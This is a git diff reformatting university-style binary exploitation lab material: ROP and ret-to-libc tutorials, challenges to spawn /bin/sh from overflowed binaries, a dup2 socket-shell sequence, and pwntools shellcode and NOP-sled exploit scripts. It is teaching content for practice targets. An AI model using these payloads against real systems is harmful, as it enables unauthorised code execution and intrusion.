+We know that the `pop` instruction is good for removing stuff from the stack. +So what we need is to execute the following two instructions: + +```asm pop ret ``` -Since `ret` is equivalent to `pop eip`, the above code removes `0xdeadbeef` from -the stack and places the instruction pointer (`eip`) at the address lying on the -stack above `0xdeadbeef`. One thing to keep in mind is that now we're only -interested in clearing the stack, so `pop` can be used with any 32 bit register. +Since `ret` is equivalent to `pop eip`, the above code removes `0xdeadbeef` from the stack and places the instruction pointer (`eip`) at the address lying on the stack above `0xdeadbeef`. +One thing to keep in mind is that now we're only interested in clearing the stack, so `pop` can be used with any 32 bit register. As a result, `overwatch`'s stack should look like the one in the image below. -Notice there are no more conflicts now. Hurray! +Notice there are no more conflicts now. +Hurray! -![Overwatch Stack without Conflicting Parameters and Addresses](assets/overwatch_stack_no_conflict.png) +![Overwatch Stack without Conflicting Parameters and Addresses](../media/overwatch_stack_no_conflict.png) #### Finding Gadgets - `ROPgadget` -The `pop; ret` instructions above are called a **gadget**, i.e. a small group of -**consecutive** instructions that ends in `ret` and which can be used to alter -the execution of a given program. Since all binaries contain a `.text` section, -which is made up of instructions, all binaries contain gadgets. Lots of them. - -The tool that we're going to use in order to find such gadgets is called -`ROPgadget`. It is already installed in the Kali VM and if you're working on -another environment, you can install it by following the instructions in the -tool's [Github repo](https://github.com/JonathanSalwan/ROPgadget). - -In order to run `ROPgadget` from your terminal, you need to specify a binary -file to it using the `--binary` parameter. 
It is also recommended (if you know -what gadgets you're looking for) to filter those you need using the `--only` -parameter. As a result, in order to obtain a `pop; ret` gadget, we need to run -the following command: -```bash + +The `pop; ret` instructions above are called a **gadget**, i.e. a small group of **consecutive** instructions that ends in `ret` and which can be used to alter the execution of a given program. +Since all binaries contain a `.text` section, which is made up of instructions, all binaries contain gadgets. +Lots of them. + +The tool that we're going to use in order to find such gadgets is called `ROPgadget`. +It is already installed in the Kali VM and if you're working on another environment, you can install it by following the instructions in the tool's [Github repo](https://github.com/JonathanSalwan/ROPgadget). + +In order to run `ROPgadget` from your terminal, you need to specify a binary file to it using the `--binary` parameter. +It is also recommended (if you know what gadgets you're looking for) to filter those you need using the `--only` parameter. +As a result, in order to obtain a `pop; ret` gadget, we need to run the following command: + +```console $ ROPgadget --binary vuln --only "pop|ret" Gadgets information ============================================================ @@ -822,44 +761,40 @@ Gadgets information 0x0804844e : ret 0xeac1 ``` -Thus, the payload needed in order to call both `overwatch` and `warcraft` is the -one showcased below, with `pop_ret_gadget_address` being set to `0x08048331` -from the output above. +Thus, the payload needed in order to call both `overwatch` and `warcraft` is the one showcased below, with `pop_ret_gadget_address` being set to `0x08048331` from the output above. 
+ ```python payload = offset * b"A" + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) ``` -Notice this yet is another example of **code reuse** since we're reusing various -chunks of instructions already present in our binary. - +Notice this is yet another example of **code reuse** since we're reusing various chunks of instructions already present in our binary. ## Challenges + ### 01. Tutorial - Bypass NX Stack with return-to-libc -Go to the [01-tutorial-ret-to-libc/](activities/01-tutorial-ret-to-libc/src/) -folder. +Go to the [01-tutorial-ret-to-libc/](activities/01-tutorial-ret-to-libc/src/) folder. -In the previous sessions we used stack overflow vulnerabilities to inject new -code into a running process (on its stack) and redirect execution to it. This -attack is easily defeated by making the stack, together with any other memory -page that can be modified, non-executable. This is achieved by setting the -**NX** bit in the page table of the current process. +In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process (on its stack) and redirect execution to it. +This attack is easily defeated by making the stack, together with any other memory page that can be modified, non-executable. +This is achieved by setting the `NX` bit in the page table of the current process. -We will try to bypass this protection for the `01-tutorial-ret-to-libc/src/auth` -binary in the lab archive. For now, disable ASLR in the a new shell: -``` -$ setarch $(uname -m) -R /bin/bash +We will try to bypass this protection for the `01-tutorial-ret-to-libc/src/auth` binary in the lab archive. +For now, disable ASLR in a new shell: + +```console +setarch $(uname -m) -R /bin/bash ``` -Let's take a look at the program headers and confirm that the stack is no longer -executable. We only have read and write (RW) permissions for the stack area. 
-The auth binary requires the `libssl1.0.0:i386` Debian package to work. You can -find `libssl1.0.0:i386` Debian package -[here](https://packages.debian.org/jessie/i386/libssl1.0.0/download). +Let's take a look at the program headers and confirm that the stack is no longer executable. +We only have read and write (RW) permissions for the stack area. +The auth binary requires the `libssl1.0.0:i386` Debian package to work. +You can find `libssl1.0.0:i386` Debian package [here](https://packages.debian.org/jessie/i386/libssl1.0.0/download). -First, let's check that *NX* bit we mentioned earlier: -``` +First, let's check that `NX` bit we mentioned earlier: + +```console $ checksec auth [...] NX: NX enabled @@ -867,27 +802,27 @@ $ checksec auth ``` For completeness, lets check that there is indeed a buffer (stack) overflow vulnerability. -``` -$ python2.7 -c 'print "A" * 1357' | ltrace -i ./auth -TODO -``` -Check the source file - the buffer length is 1337 bytes. There should be a base -pointer and the `main()`'s return address just before it on the stack. There is -also some alignment involved, but we can easily try a few lengths to get the -right position of the return address. Seems to be 1337 + 16 followed by the -return address for this case. You can, of course, determine the distance between -the buffer's start address and the frame's return address exactly using objdump, -but we will leave that as an exercise. - -We can now jump anywhere. Unfortunately, we cannot put a shellcode in the buffer -and jump into it because the stack is non-executable now. Lets try it with a few -`NOP`s. Our buffer's address is `0xbfffee63` (see the `gets()` call). +```console +python2.7 -c 'print "A" * 1357' | ltrace -i ./auth ``` + +Check the source file - the buffer length is 1337 bytes. +There should be a base pointer and the `main()`'s return address just before it on the stack. 
+There is also some alignment involved, but we can easily try a few lengths to get the right position of the return address. +Seems to be 1337 + 16 followed by the return address for this case. +You can, of course, determine the distance between the buffer's start address and the frame's return address exactly using objdump, but we will leave that as an exercise. + +We can now jump anywhere. +Unfortunately, we cannot put a shellcode in the buffer and jump into it because the stack is non-executable now. +Lets try it with a few `NOP`s. +Our buffer's address is `0xbfffee63` (see the `gets()` call). + +```console $ python2.7 -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | ltrace -i ./auth [0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 [0x8048601] malloc(20) = 0x0804b008 -[0x80485df] puts("Enter password: "Enter password: +[0x80485df] puts("Enter password: "Enter password: ) = 17 [0x80485ea] gets(0xbfffee63, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7) = 0xbfffee63 [0x8048652] memset(0x0804b008, '\000', 20) = 0x0804b008 @@ -896,9 +831,12 @@ $ python2.7 -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | lt [0xffffffff] +++ killed by SIGSEGV +++ ``` -Guess what? It didn't work... How about we try to jump to some existing code? +Guess what? +It didn't work. +How about we try to jump to some existing code? First, let's take a look at the `check_password()` function. -``` + +```console $ objdump -M intel -d auth | grep -A 15 ":" 080485ec : 80485ec: 55 push ebp @@ -919,9 +857,10 @@ $ objdump -M intel -d auth | grep -A 15 ":" ``` Lets try `0x804860f` such that we print the `malloc` failure message. 
-``` + +```console $ python2.7 -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./auth -[0x80485df] puts("Enter password: "Enter password: +[0x80485df] puts("Enter password: "Enter password: ) = 17 [0x804861b] puts("malloc failed"malloc failed ) = 14 @@ -929,70 +868,66 @@ $ python2.7 -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./aut ``` ### 02. Challenge - ret-to-libc -So far, so good! Now let's get serious and do something useful with this. -Continue working in the `01-tutorial-ret-to-libc/` folder in the activities -archive. +So far, so good! +Now let's get serious and do something useful with this. + +Continue working in the `01-tutorial-ret-to-libc/` folder in the activities archive. + +The final goal of this task is to bypass the NX stack protection and call `system("/bin/sh")`. +We will start with a simple `ret-to-plt`: -The final goal of this task is to bypass the NX stack protection and call -`system("/bin/sh")`. We will start with a simple ret-to-plt: 1. Display all libc functions linked with the auth binary. -2. Return to `puts()`. Use ltrace to show that the call is actually being made. -3. Find the offset of the `"malloc failed"` static string in the binary. -4. Make the binary print `"failed"` the second time `puts()` is called. -5. **(bonus)** The process should SEGFAULT after printing `Enter password:` -again. Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). -You can move on to the next task without solving this problem. -6. Remember how we had ASLR disabled? The other libc functions are in the -memory, you just need to find their addresses. Find the offset of `system()` in -libc. Find the offset of the `"/bin/sh"` string in libc. -7. Where is libc linked in the auth binary? Compute the final addresses and call -`system("/bin/sh")` just like you did with `puts()`. - -
- Hint 1 -Use LD_TRACE_LOADED_OBJECTS=1 ./auth instead of ldd. -The latter is not always reliable, because the order in which it loads the -libraries might be different than when you actually run the binary. -
- -
- Hint 2 -When you finally attack this, stdin will get closed and the new -shell will have nothing to read. Use cat to concatenate your attack -string with stdin like this: -cat <(python -c 'print “L33T_ATTACK”') - | ./vulnbinary. - -Note the use of the - (dash) character before the | -(pipe). This prevents the closing of the input file descriptor of the pipe when -cat's output finished (i.e. when the EOF character is -received). -
+1. Return to `puts()`. + Use ltrace to show that the call is actually being made. +1. Find the offset of the `"malloc failed"` static string in the binary. +1. Make the binary print `"failed"` the second time `puts()` is called. +1. **(bonus)** The process should SEGFAULT after printing `Enter password:` again. + Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). + You can move on to the next task without solving this problem. +1. Remember how we had ASLR disabled? + The other libc functions are in the memory, you just need to find their addresses. + Find the offset of `system()` in libc. + Find the offset of the `"/bin/sh"` string in libc. +1. Where is libc linked in the auth binary? + Compute the final addresses and call `system("/bin/sh")` just like you did with `puts()`. + +**Hint 1**: +Use `LD_TRACE_LOADED_OBJECTS=1 ./auth` instead of `ldd`. +The latter is not always reliable, because the order in which it loads the libraries might be different than when you actually run the binary. + +**Hint 2**: +When you finally attack this, `stdin` will get closed and the new shell will have nothing to read. +Use `cat` to concatenate your attack string with `stdin` like this: + +```console +cat <(python -c 'print "L33T_ATTACK"') - | ./vulnbinary +``` + +Note the use of the `-` (dash) character before the `|` (pipe). +This prevents the closing of the input file descriptor of the pipe when `cat`'s output finishes (i.e. when the `EOF` character is received). ### 03. Challenge - no-ret-control -Go to the -[03-challenge-no-ret-control/](/activities/03-challenge-no-ret-control/src) -folder in the activities archive. -Imagine this scenario: we have an executable where we can change at least 4 -bytes of random memory, but ASLR is turned on. We cannot reliably change the -value of the return address because of this. Sometimes `ret` is not even called -at the end of a function. 
+Go to the [03-challenge-no-ret-control/](/activities/03-challenge-no-ret-control/src) folder in the activities archive. + +Imagine this scenario: we have an executable where we can change at least 4 bytes of random memory, but ASLR is turned on. +We cannot reliably change the value of the return address because of this. +Sometimes `ret` is not even called at the end of a function. Alter the execution of `force_exit`, in order to call the secret function. ### 04. Challenge - ret-to-plt -Go to the [04-challenge-ret-to-plt/](/activities/04-ret-to-plt/src) folder in -the activities archive. + +Go to the [04-challenge-ret-to-plt/](/activities/04-ret-to-plt/src) folder in the activities archive. `random` is a small application that generates a random number. -Your task is to build an exploit that makes the application always print the -same second random number. That is the first printed random number is whatever, -but the second printed random number will always be the same, for all runs. In -the sample output below the second printed random number is always `1023098942` -for all runs. -``` +Your task is to build an exploit that makes the application always print the same second random number. +That is the first printed random number is whatever, but the second printed random number will always be the same, for all runs. +In the sample output below the second printed random number is always `1023098942` for all runs. + +```console hari@solyaris-home:~$ python2.7 -c 'print ' | ./random Hi! Options: 1. Get random number @@ -1017,35 +952,36 @@ Here's a random number: 1023098942. Have fun with it! You can use the Python skeleton given in section [NOP Analogy](#nop-analogy) for the buffer overflow input. -**Bonus:** The process should SEGFAULT after printing the second (constant) -number. Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). +**Bonus:** The process should SEGFAULT after printing the second (constant) number. 
+Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). ### 05. Challenge - gadget tutorial -This task requires you to construct a payload using gadgets and calling the -functions inside such that it will print -``` + +This task requires you to construct a payload using gadgets and calling the functions inside such that it will print + +```text Hello! stage A!stage B! ``` Make it also print the messages in reverse order: -``` + +```text Hello! stage B!stage A! ``` ### 06. Bonus Challenge - Echo service +This task is a network service that can be exploited. +Run it locally and try to exploit it. +You'll find that if you call `system("/bin/sh")` the shell is opened in the terminal where the server was started instead of the one where the attack takes place. +This happens because the client-server communication takes place over a socket. +When you spawn a shell it will inherit the Standard I/O descriptors from the parent and use those. +To fix this you need to redirect the socket fd into 0,1 (and optionally 2). -This task is a network service that can be exploited. Run it locally and try to -exploit it. You'll find that if you call `system("/bin/sh")` the shell is opened -in the terminal where the server was started instead of the one where the attack -takes place. This happens because the client-server communication takes place -over a socket. When you spawn a shell it will inherit the Standard I/O -descriptors from the parent and use those. To fix this you need to redirect the -socket fd into 0,1 (and optionally 2). +So you will need to do the equivalent of the following, as part of a `ROP` chain: -So you will need to do the equivalent of the following, as part of a ROP chain: ```c dup2(sockfd, 1); dup2(sockfd, 0); @@ -1054,12 +990,10 @@ system("/bin/sh"); Exploit it first with ASLR disabled and then with it enabled. 
- ## Conclusions + At the end of this session, you should: -- Understand the limitations of classic buffer overflow attacks, as well as -shellcodes. -- Understand and visualise the effect of various simple ROP attacks on a -program's stack -- Be able to craft and make use of ROP chains in order to hack vulnerable -binaries + +- Understand the limitations of classic buffer overflow attacks, as well as shellcodes. +- Understand and visualise the effect of various simple `ROP` attacks on a program's stack +- Be able to craft and make use of `ROP` chains in order to hack vulnerable binaries diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py index a24ec11..3279f74 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py @@ -17,10 +17,13 @@ shellcode = asm(shellcode_asm) print(len(shellcode)) -io = gdb.debug(BIN, gdbscript=""" +io = gdb.debug( + BIN, + gdbscript=""" break vuln.c:9 continue - """) + """, +) str_addr = io.recvline().strip(b"\n") addr = int(str_addr, 16) @@ -28,7 +31,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py index 4024dc8..570c486 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py +++ 
b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py @@ -17,7 +17,7 @@ print(len(shellcode)) payload = shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py index 5f3ee2b..6347a08 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py @@ -11,7 +11,7 @@ offset = 0x800 # Determined with gdb -addr = 0x7fffffffce30 +addr = 0x7FFFFFFFCE30 nop_sled = "" # nop_sled += "NOP\n" * 0x600 @@ -23,7 +23,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py index 9173066..8032375 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py @@ -3,7 +3,7 @@ context.binary = "./vuln" -addr = 0x7fffffffcce0 + 500 +addr = 0x7FFFFFFFCCE0 + 500 # 0x7fffffffcdc0 offset = 0x800 @@ -16,11 +16,8 @@ print(len(shellcode)) payload = shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) io.interactive() - - - diff --git 
a/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py index 61a7237..1a61b7b 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py @@ -56,10 +56,13 @@ # shellcode = asm(nullfree_shellcode_asm) shellcode = b"AAAAAAAAAAA" -io = gdb.debug(BIN, gdbscript=""" +io = gdb.debug( + BIN, + gdbscript=""" break vuln.c:12 continue - """) + """, +) str_addr = io.recvline().strip(b"\n") addr = int(str_addr, 16) @@ -67,7 +70,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) payload += b"\n" diff --git a/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md b/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md index 2f719a8..71a2eda 100644 --- a/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md +++ b/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md @@ -1,46 +1,31 @@ ---- -linkTitle: Shellcodes Advanced -type: docs -weight: 10 ---- +# Shellcodes (Advanced) -
- Table of contents - - * [Introduction](#introduction) - * [Tutorials](#tutorials) - * [01. Tutorial: preventing stack operations from overwriting the shellcode](#01-tutorial-preventing-stack-operations-from-overwriting-the-shellcode) - * [02. Tutorial: NOP sleds](#02-tutorial-nop-sleds) - * [03. Tutorial: null-free shellcodes](#03-tutorial-null-free-shellcodes) - * [04. Tutorial: shellcodes in pwntools](#04-tutorial-shellcodes-in-pwntools) - * [05. Tutorial: alphanumeric shellcode](#05-tutorial-alphanumeric-shellcode) - * [Challenges](#challenges) - * [06. Challenge: NOP sled redo](#06-challenge-nop-sled-redo) - * [07. Challenge: No NOPs allowed!](#07-challenge-no-nops-allowed) - * [08. Challenge: multiline output](#08-challenge-multiline-output) - * [09: Challenge: execve blocking attempt](#09-challenge-execve-blocking-attempt) - * [Further Reading](#further-reading) - * [Input restrictions](#input-restrictions) +In [the "Shellcodes" session](../../shellcodes/reading), we learned about **shellcodes**, a form of **code injection** which allowed us to hijack the control flow of a process and make it do our bidding. -
+## Introduction -# Introduction +The three steps for a successful shellcode attack are: -In [the previous session](../shellcodes), we learned about **shellcodes**, a form of **code injection** which allowed us to hijack the control flow of a process and make it do our bidding. The three steps for a succesful shellcode attack are: +- **develop**: obtain the machine code for the desired functionality +- **inject**: place the shellcode into the process' address space +- **trigger**: divert control flow to the beginning of our shellcode - * **develop**: obtain the machine code for the desired functionality - * **inject**: place the shellcode into the process' address space - * **trigger**: divert control flow to the beginning of our shellcode +The first step seems pretty straightforward, but there are a lot of things that could go wrong with the last two. +For example, we cannot inject a shellcode in a process that doesn't read input or reads very little (though remember that if we can launch the target program we can place the shellcode inside its environment or command line arguments); +we cannot trigger our shellcode if we cannot overwrite some code-pointer (e.g. +a saved return) or if we do not know the precise address at which it ends up in the process' memory and we cannot use such an attack if there isn't some memory region where we have both write and execute permissions. -The first step seems pretty straightforward, but there are a lot of things that could go wrong with the last two. For example, we cannot inject a shellcode in a process that doesn't read input or reads very little (though remember that if we can launch the target program we can place the shellcode inside its environment or command line arguments); we cannot trigger our shellcode if we cannot overwrite some code-pointer (e.g. 
a saved return) or if we do not know the precise address at which it ends up in the process' memory and we cannot use such an attack if there isn't some memory region where we have both write and execute permissions. +Some of these hurdles can occur naturally, while others are intentionally created as preventive measures (e.g. +on modern platforms, any memory area can be either writable or executable, but not both, a concept known as [W^X](https://en.wikipedia.org/wiki/W%5EX)). +Anyway, it is useful to think about these problems and how to work around them, then put that knowledge into practice. -Some of these hurdles can occur naturally, while others are intentionally created as preventive measures (e.g. on modern platforms, any memory area can be either writable or executable, but not both, a concept known as [W^X](https://en.wikipedia.org/wiki/W%5EX)). Anyway, it is useful to think about these problems and how to work around them, then put that knowledge into practice. +## Tutorials -# Tutorials +### 01. Tutorial: preventing stack operations from overwriting the shellcode -## 01. Tutorial: preventing stack operations from overwriting the shellcode - -When performing a shellcode attack we often needed to write some stuff in memory so that it has a valid address. For example, to perform an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` syscall, we need to place the string `"/bin/sh"` in memory and fill the `rdi` register (first argument of a syscall) with that address. In theory we could write it in any writable area but, as you might have noticed in the previous session, it's usually simpler to just use the stack. +When performing a shellcode attack we often needed to write some stuff in memory so that it has a valid address. +For example, to perform an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` syscall, we need to place the string `"/bin/sh"` in memory and fill the `rdi` register (first argument of a syscall) with that address. 
+In theory we could write it in any writable area but, as you might have noticed in the previous session, it's usually simpler to just use the stack. ```asm mov rax, `/bin/sh` @@ -58,36 +43,49 @@ results in fewer machine-code bytes than: plus, `push`-ing has the side effect of placing our address in the `rsp` register which we could later `mov` somewhere else, avoiding the need of explicitly referring to some address (which might be difficult to predict, or even random, in the case of ASLR). -In cases where our shellcode is also injected on the stack this leads to the complicated situation in which the stack serves as both a code and data region. If we aren't careful, our data pushes might end up overwriting the injected code and ruining our attack. +In cases where our shellcode is also injected on the stack this leads to the complicated situation in which the stack serves as both a code and data region. +If we aren't careful, our data pushes might end up overwriting the injected code and ruining our attack. -Run `make` then use the `exploit.py` script (don't bother with how it works, for now); it will create a shellcode, pad it and feed it to the program, then open a new terminal window with a `gdb` instance breaked at the end of the `main` function. You can then explore what happens step by step and you will notice that, as the shellcode pushes the data it needs onto the stack it eventually comes to overwrite itself, resulting in some garbage. +Run `make` then use the `exploit.py` script (don't bother with how it works, for now); +it will create a shellcode, pad it and feed it to the program, then open a new terminal window with a `gdb` instance stopped at a breakpoint at the end of the `main` function. +You can then explore what happens step by step and you will notice that, as the shellcode pushes the data it needs onto the stack it eventually comes to overwrite itself, resulting in some garbage. 
-The problem is that, after executing `ret` at the end of `main` and getting hijacked to jump to the beginning of our shellcode, `rip` ends up at `0x7ffca44f2280`, while `rsp` ends up at `0x7ffca44f22c0` (addresses on your machine will probably differ). The instruction pointer is only 64 bytes **below** the stack pointer. +The problem is that, after executing `ret` at the end of `main` and getting hijacked to jump to the beginning of our shellcode, `rip` ends up at `0x7ffca44f2280`, while `rsp` ends up at `0x7ffca44f22c0` (addresses on your machine will probably differ). +The instruction pointer is only 64 bytes **below** the stack pointer. - * as instructions get executed, the instruction pointer is *incremented* - * as values are pushed onto the stack, the stack pointer is *decremented* +- as instructions get executed, the instruction pointer is incremented +- as values are pushed onto the stack, the stack pointer is decremented -Thus the difference will shrink more and more with each instruction executed. The total length of the shellcode is 48 bytes so that means that after pushing 16 bytes onto the stack (64 - 48) any `push` will overwrite the end of our shellcode! +Thus the difference will shrink more and more with each instruction executed. +The total length of the shellcode is 48 bytes so that means that after pushing 16 bytes onto the stack (64 - 48) any `push` will overwrite the end of our shellcode! -One obvious solution is to try and modify our shellcode to make it shorter, or to make it push less data onto the stack; this might work in some situations, but it's not a general fix. +One obvious solution is to try and modify our shellcode to make it shorter, or to make it push less data onto the stack; +this might work in some situations, but it's not a general fix. -Remember that after the vulnerable function returns, we control the execution of the program; so we can control what happens to the stack! 
Then we'll simply move the top of the stack to give us some space by adding this as the first instruction to our shellcode: +Remember that after the vulnerable function returns, we control the execution of the program; +so we can control what happens to the stack! +Then we'll simply move the top of the stack to give us some space by adding this as the first instruction to our shellcode: ```asm sub rsp, 64 ``` -Now, right after jumping to our shellcode, `rip` and `rsp` will be the same, but they'll go on in opposite directions and everything will be well. Uncomment line 64 in `exploit.py`, run it again and see what happens. +Now, right after jumping to our shellcode, `rip` and `rsp` will be the same, but they'll go on in opposite directions and everything will be well. +Uncomment line 64 in `exploit.py`, run it again and see what happens. -If we're at the very low-edge of the stack and can't access memory below, we can use `add` to move the stack pointer way up, so that even if the pushed data comes towards our injected code, it will not reach it; after all, our shellcode is short and we're not pushing much. +If we're at the very low-edge of the stack and can't access memory below, we can use `add` to move the stack pointer way up, so that even if the pushed data comes towards our injected code, it will not reach it; +after all, our shellcode is short and we're not pushing much. -## 02. Tutorial: NOP sleds +### 02. Tutorial: NOP sleds -In the previous session, you probably had some difficulties with the [ninth task](../shellcodes#09-challenge-shellcode-after-saved-ret---no-leak), which asked you to perform a shellcode-on-stack attack without having a leak of the overflown buffer's address. You can determine it using `gdb` but, as you've seen, things differ between `gdb` and non-`gdb` environments; the problem is even worse if the target binary is running on a remote machine. 
+In the previous session, you probably had some difficulties with the 9th task in [the "Shellcodes" section](../../shellcodes/reading), which asked you to perform a shellcode-on-stack attack without having a leak of the overflown buffer's address. +You can determine it using `gdb` but, as you've seen, things differ between `gdb` and non-`gdb` environments; +the problem is even worse if the target binary is running on a remote machine. -The crux of the issue is the fact that we have to precisely guess **one** exact address where our shellcode begins. For example, our shellcode might end up looking like this in memory: +The crux of the issue is the fact that we have to precisely guess **one** exact address where our shellcode begins. +For example, our shellcode might end up looking like this in memory: -``` +```text 0x7fffffffce28: rex.WX adc QWORD PTR [rax+0x0],rax 0x7fffffffce2c: add BYTE PTR [rax],al 0x7fffffffce2e: add BYTE PTR [rax],al @@ -100,28 +98,33 @@ The crux of the issue is the fact that we have to precisely guess **one** exact The first instruction of our shellcode is the `push 0x68` at address `0x7fffffffce30`: - * if we jump before it, we'll execute some garbage interpreted as code; in the above example, missing it by two bytes would execute `add BYTE PTR [rax],al` which might SEGFAULT if `rax` doesn't happen to hold a valid writable address - * if we jump after it, we'll have a malformed `"/bin/sh"` string on the stack, so the later `execve` call will not work. +- if we jump before it, we'll execute some garbage interpreted as code; +in the above example, missing it by two bytes would execute `add BYTE PTR [rax],al` which might SEGFAULT if `rax` doesn't happen to hold a valid writable address +- if we jump after it, we'll have a malformed `"/bin/sh"` string on the stack, so the later `execve` call will not work. 
-Fortunately, we don't have to consider the entire address space, so our chances are better than 1 in 264: +Fortunately, we don't have to consider the entire address space, so our chances are better than 1 in $2^{64}$. - * the stack is usually placed at a fixed address (e.g. 0x7fffffffdd000), so we have a known-prefix several octets wide - * due to alignment concerns, the compiler emits code that places buffers and other local data at nice, rounded addresses (ending in `0`, or `c0`, `00` etc.), so we have a known-suffix several bits wide +- the stack is usually placed at a fixed address (e.g. +0x7fffffffdd000), so we have a known-prefix several octets wide +- due to alignment concerns, the compiler emits code that places buffers and other local data at nice, rounded addresses (ending in `0`, or `c0`, `00` etc.), so we have a known-suffix several bits wide On your local machine, using `gdb` to look at the buffer's address will then allow you to use just a bit of bruteforce search to determine the address outside of `gdb`. -But what if we could increase our chances to jump to the beginning of our shellcode? So that we don't have to guess **one** exact address, but just hit some address range? This is where "NOP sleds" come in. +But what if we could increase our chances to jump to the beginning of our shellcode? +So that we don't have to guess **one** exact address, but just hit some address range? +This is where "NOP sleds" come in. -A "NOP sled" is simply a string of `NOP` instructions added as a prefix to a shellcode. The salient features of a `NOP` instruction that make it useful for us are: +A "NOP sled" is simply a string of `NOP` instructions added as a prefix to a shellcode.
+The salient features of a `NOP` instruction that make it useful for us are: - * it does nothing - * it's one byte long +- it does nothing +- it's one byte long Thus if we chain a bunch of these together and prepend them to our shellcode, we can jump inside the middle of the "NOP sled" at any position and it will be alright: each subsequent `NOP` instruction will be executed, doing nothing, then our shellcode will be reached. Our shellcode will end up looking like this in the process memory: -``` +```text 0x7fffffffd427: mov BYTE PTR [rax], al 0x7fffffffd429: nop 0x7fffffffd42a: nop @@ -135,22 +138,36 @@ Our shellcode will end up looking like this in the process memory: 0x7fffffffd43c: push rax ``` -Again, our first "useful" instruction is the `push 0x68` at `0x7fffffffd430`. Jumping after it and skipping its execution is still problematic, but notice that we can now jump **before** it, missing it by several bytes with no issue. If we jump to `0x7fffffffd42c` for example, we'll reach a `nop`, then execution will pass on to the next `nop` and so on; after executing 4 nops, our shellcode will be reached and everything will be as if we had jumped directly to `0x7fffffffd430` in the first place. There is now a continuous range of 8 addresses where it's ok to jump to. +Again, our first "useful" instruction is the `push 0x68` at `0x7fffffffd430`. +Jumping after it and skipping its execution is still problematic, but notice that we can now jump **before** it, missing it by several bytes with no issue. +If we jump to `0x7fffffffd42c` for example, we'll reach a `nop`, then execution will pass on to the next `nop` and so on; +after executing 4 nops, our shellcode will be reached and everything will be as if we had jumped directly to `0x7fffffffd430` in the first place. +There is now a continuous range of 8 addresses where it's ok to jump to. -But 8 is such a small number; the longer the NOP sled, the better our chances. 
